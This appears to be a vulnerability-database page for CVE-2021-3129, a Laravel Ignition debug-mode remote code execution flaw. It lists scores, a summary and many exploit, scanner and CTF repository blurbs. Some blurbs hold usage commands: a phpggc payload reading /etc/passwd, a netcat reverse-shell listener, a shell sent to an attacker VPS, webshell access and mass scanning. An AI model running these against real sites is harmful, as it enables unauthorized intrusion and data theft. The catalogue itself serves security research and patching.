CVE-2021-3129

Published: 12/01/2021 Updated: 22/02/2022
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 680
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Ignition prior to 2.5.2, as used in Laravel and other products, allows unauthenticated remote malicious users to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel prior to 8.4.2.

Vulnerable Product

facade ignition

Exploits

Ignition versions prior to 2.5.2, as used in Laravel and other products, allow unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel versions prior to 8.4.2 ...

Github Repositories

CTF produced for Sourcetoad Q4 2021

Sourcetoad CTF 2021. Produced by @iBotPeaches (Connor Tumbleson), for a Q4 2021 Engineer challenge. Originally hosted on CTFd.io with a combination of some t3.nano instance on AWS. Most puzzles were simple index.html files leading to assets/images/files. Complex puzzles leveraged the services feature of CTFd to deploy a docker image. Completed on December 3, 2021 at Sourcetoad w

Exploit example code for CVE-2021-33831

Introduction: The application is used for tracking people according to German infection laws to be able to trace Covid-19 infection chains. It was created by a student project called iCampus and is used not only at the university in Wildau but also at Cottbus-Senftenberg. Around 10000 people are affected. Guests of the universities are required to use this application. The appl

CVE-2021-3129 POC

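Laravel-CVE-2021-3129 CVE-2021-3129 Description: Combines github.com/zhzyker/CVE-2021-3129 and github.com/SNCKER/CVE-2021-3129. This project has the following advantages: keeps the custom command feature; adds automatic exit on successful exploitation, improving efficiency; keeps the 11 exploit chains; adds more escaped_chars and wraps commands in parentheses, reducing the chance that a command fails to execute. Installation: pip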

Unauthenticated RCE in Laravel Debug Mode <8.4.2

CVE-2021-3129: Yet another exploit for CVE-2021-3129! Made to have more features and reliability. Based on pentest-tools.com/blog/exploit-rce-vulnerability-laravel-cve-2021-3129. DISCLAIMER: This script is made to audit the security of systems. Only use this script on your own systems or on systems you have written permission to exploit.

call nuclei scan engine with golang

nuclei-plus: Allows Golang to call Nuclei directly to get scan results. Install: go get github.com/randolphcyg/nucleiplus Case: use nuclei-plus to scan CVE-2021-3129: cd /opt # clone vulhub git clone github.com/vulhub/vulhub.git # start CVE-2021-3129 env cd /opt/vulhub/laravel/CVE-2021-3129/ docker-compose build docker-compose up -d #

Laravel RCE CVE-2021-3129

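CVE-2021-3129 Laravel RCE CVE-2021-3129. Vulnerability overview: When Laravel has debug mode enabled, the insecure use of file_get_contents() and file_put_contents() by the Ignition component bundled with Laravel lets an attacker trigger Phar deserialization by sending malicious requests, crafting a malicious log file and similar means, ultimately resulting in remote code execution. Affected versions: Laravel <= 8.4.2. Vulnerability verification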

Horizontall - StrAPI - Laravel. Synopsis: “Horizontall” is marked as an easy difficulty machine which features multiple SSH and Nginx services. VHOST is enabled on the server and it is running a Beta version of the StrAPI application, and it has multiple vulnerabilities. We gain access to the StrAPI application dashboard via exploiting a bug in access control and then gain shell acce

Laravel debug mode - Remote Code Execution (RCE)

CVE-2021-3129 Laravel debug mode - Remote Code Execution (RCE). cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3129 www.ambionics.io/blog/laravel-debug-rce github.com/ambionics/phpggc Example: python3 exploit.py 127.0.0.1:8080 python3 exploit.py 127.0.0.1:8080 --phar $(php -d phar.readonly=off -d phar

Add revert shell

CVE-2021-3129 Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129) Use: python3 exp.py 127.0.0.1:8888 [*] Try to use Laravel/RCE1 for exploitation [+]exploit: [*] Laravel/RCE1 Result: [*] Try to use Laravel/RCE2 for exploitation [+]exploit: [*] Laravel/RCE2 Result: [*] Try to use Laravel/RCE3 for exploitation [+]exploit: [*] Laravel/RCE3 R

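evil_ftp: This script is best used together with CVE-2021-3129 laravel debug rce. Run the script above and a malicious FTP service starts (the comments are already quite detailed). What the script does is simple: when the client connects for the first time, it returns our preset payload; when the client connects a second time, it redirects the client's connection to 127.0.0.1:9000, that is, our php-fpm service's port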

Laravel debug rce

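CVE-2021-3129 Laravel debug rce. How to use: run docker-compose up -d to start the environment. Visit port 8888 and click "generate key" on the home page to reproduce it. A few points about the docker environment: copying .env.example to .env serves to enable the debug environment; phar.readonly is turned off in php.ini; a hello template that references an undefined variable was added under resources/view/, and in routes/web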

Ensimag 3A - Exploit on CVE 2021-3129

Security Assignment 2 - Ensimag 3A. Exploit setup: Go to the project root and, in a terminal, run: docker-compose build docker-compose up -d docker-compose exec exploit bash Once connected to the container, run: (python3 exploit.py &); nc -lnvp 4444

CVE-2021-3129 | Laravel Debug Mode Vulnerability

CVE-2021-3129 Mass Scan Tools For Laravel <= V8.4.2 Debug Mode Remote Code Execution (RCE) | Python. Reference: Ambionics.io, PHPGGC. Chain PHPGGC: Laravel/RCE1 Laravel/RCE2 Laravel/RCE3 Laravel/RCE4 Laravel/RCE5 Laravel/RCE6 Laravel/RCE7 Monolog/RCE1 Monolog/RCE2 Monolog/RCE3 Monolog/RCE4. Environment Variables: In order to run this project, you need to ensure some variabl

Exploit for CVE-2021-3129

CVE-2021-3129_exploit: Exploit for CVE-2021-3129. Lab setup: $ git clone github.com/laravel/laravel.git $ cd laravel $ git checkout e849812 $ composer install $ composer require facade/ignition==2.5.1 $ php artisan serve Usage: $ git clone github.com/nth347/CVE-2021-3129_exploit.git $ cd CVE-2021-3129_exploit $ chmod +x expl

Laravel RCE (CVE-2021-3129)

CVE-2021-3129 Laravel RCE (CVE-2021-3129). Test Environment: mkdir CVE-2021-3129-docker cd CVE-2021-3129-docker wget raw.githubusercontent.com/vulhub/vulhub/master/laravel/CVE-2021-3129/docker-compose.yml docker compose up -d Usage: git clone github.com/miko550/CVE-2021-3129.git cd CVE-2021-3129 pip install -r requirements.tx

CVE-2021-3129 Exploit Checker By ./MrMad

Laravel-debug-Checker: CVE-2021-3129 Checker By ./MrMad. Reference: pentest-tools.com/blog/exploit-rce-vulnerability-laravel-cve-2021-3129 Install module: python -m pip install -r requirements.txt Installation on linux: git clone github.com/MadExploits/Laravel-debug-Checker sudo mv Laravel_debug.py /usr/bin/laravel_debug sudo

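CVE-2021-3129. Affected scope: Laravel <= 8.4.2, Ignition < 2.5.2. For testing and research use only. For testing and research use only. For testing and research use only. Environment: Note that it must be run from the phpggc directory, and a php-cli environment is required. Usage: python3 exp.py url vps_ip vps_port Local test result: as shown in the figure below, tested in local WSL, a shell was received on my own VPS. Vulnerability a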

laravel-CVE-2021-3129-EXP: CVE-2021-3129 one-click getshell. Usage: python3 laravel-CVE-2021-3129-EXP.py 127.0.0.1:8000 After success, simply connect with Godzilla.

PoC for CVE-2021-3129 (Laravel)

CVE-2021-3129: PoC for CVE-2021-3129 (Laravel). For educational purposes only. Test: Set up the PoC environment: $ docker-compose build $ docker-compose up -d Confirm it works: See localhost:8000/ and make sure the Laravel default page is shown. Exploit: $ docker-compose exec attacker sh / # python3 exploit.py

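Laravel_CVE-2021-3129_EXP. Reference exp: github.com/SNCKER/CVE-2021-3129 Version requirements: Laravel Ignition == 2.5.1. Local version on which the EXP worked: Laravel 8.4.2. Notes: this exp must be placed in the phpggc directory, otherwise phpggc cannot be called. example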

Laravel-842-rce-CVE-2021-3129: exploit.py tested using python3, and only working with phpggc. First docker-compose up, port 8888 on 127.0.0.1. Generate key first.

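CVE-2021-3129-Laravel Debug mode remote code execution vulnerability

CVE-2021-3129: CVE-2021-3129-Laravel Debug mode remote code execution vulnerability. Affected versions and conditions: Laravel <= 8.4.2, Ignition < 2.5.2. Environment setup: docker pull vulhub/laravel:8.4.2 Using the exp: download and run in the same directory as exploit.py: git clone github.com/ambionics/phpggc.git python3 exploit.py 127.0.0.1:80 "whoami"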

Laravel Debug mode RCE vulnerability (CVE-2021-3129) poc / exp

Laravel Debug mode RCE vulnerability (CVE-2021-3129) poc / exp. CVE-2021-3129 exp / poc. Note ⚠️: because exploiting and detecting this vulnerability sends multiple requests, the exploitation and detection process may be slow. usage: python CVE-2021-3129.py usage: python CVE-2021-3129.py -u [url] --exp Laravel Debug mode RCE(CVE-2021-3129)POC & EXP optional arguments: -h, --help show th

Tools-collection: a place for some (uncommon) tools collected from the internet. Laravel\CVE-2021-3129-main: github.com/zhzyker/CVE-2021-3129/ xxl-job-rce: github.com/mrknow001/xxl-job-rce RuoYi system vulnerability exploitation: github.com/thelostworldFree/Ruoyi-All

Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)

CVE-2021-3129 Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129). Modified @crisprss's github.com/crisprss/Laravel_CVE-2021-3129_EXP, adding more usable gadgets to iterate over. Use: python3 exp.py 127.0.0.1:8888 Result: zhzy@debian:/opt/tools/vuln/laravel/CVE-2021-3129/phpggc$ python3 exp

Used to record some vulnerabilities studied. CMS: laravel debug rce CVE-2021-3129, xyhcms front-end deserialization

CVE-2021-3129-Laravel Debug mode

CVE-2021-3129. Generate a phar package with a custom command: php -d'phar.readonly=0' ./phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w0 php -a (enters the PHP command-line environment) $fp = fopen('php://output', 'w'); stream_filter_append($fp, 'convert.quoted-printable-encode'); $size = ""; fwrite($fp, iconv(

WriteUp Horizontall: Horizontall is an easy-difficulty Linux machine where only the HTTP and SSH services are exposed. Enumeration of the website reveals that it is built using the Vue JS framework. Reviewing the source code of the Javascript file reveals a new virtual host. This host cont

Exploit for CVE-2021-3129

laravel-exploits: Exploit for CVE-2021-3129. Details: www.ambionics.io/blog/laravel-debug-rce Usage: $ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./laravel-ignition-rce.py localhost:8000/ /tmp/exploit.phar Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log Logs cleared Successfu

CVE-2021-3129

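CVE-2021-3129 Usage notes: Note: a local PHP environment is required. python3 CVE-2021-3129.py -u 127.0.0.1:80 (PoC detection only) python3 CVE-2021-3129.py -u 127.0.0.1:80 -c whoami (command execution; by default it iterates over all exploit chains) python3 CVE-2021-3129.py -u 127.0.0.1:80 -c whoami -chain laravel/rce1 (if a usable exploit chain has been detected, it can be selected directly)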

A Vulnerable and Exploitable version of UniShare Project

UniXploit: A Vulnerable and Exploitable version of UniShare Project, built with Laravel 8. Description: Actually, this project is used for the final task of the Software Testing and Web Programming course, but I set this project to test CVE-2019-3129. So this project is an archive of Laravel version 8 which is vulnerable to RCE. CVE-2021-3129: in early 2021, Laravel had a vulnera

Laravel RCE (CVE-2021-3129)

CVE-2021-3129 - Laravel RCE. About: The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability. This script allows you to write/execute commands on a website running Laravel <= v8.4.2, that has "APP_DEBUG" set to "true" in its ".env" file. It currently has support for searching the log file, executing commands, writi

Mass Scanner for CVE-2021-3129 Laravel Debug RCE Usage $ bash massCVE-2021-3129scansh listtxt

Laravel Automated Vulnerability Scanner

Todo: Laravel Fingerprint; Laravel Leak .env; Laravel Debug Mode; Laravel CVE-2018-15133; Laravel Ignition CVE-2021-3129; Insecure Deserialization with APP_KEY leaked; Interactive mode. Install: Clone repo and dependency: git clone github.com/carlosevieira/larasploit cd larasploit pip3 install -r requirements.txt Run: python3

Recent Articles

RUBYCARP hackers linked to 10-year-old cryptomining botnet
BleepingComputer • Bill Toulas • 09 Apr 2024

A Romanian botnet group named 'RUBYCARP' is leveraging known vulnerabilities and performing brute force attacks to breach corporate networks and compromise servers for financial gain. According to a new report by Sysdig, RUBYCARP currently operates a botnet managed via private IRC channels comprising over 600 compromised servers. Sysdig has found 39 variants of the RUBYCARP botnet...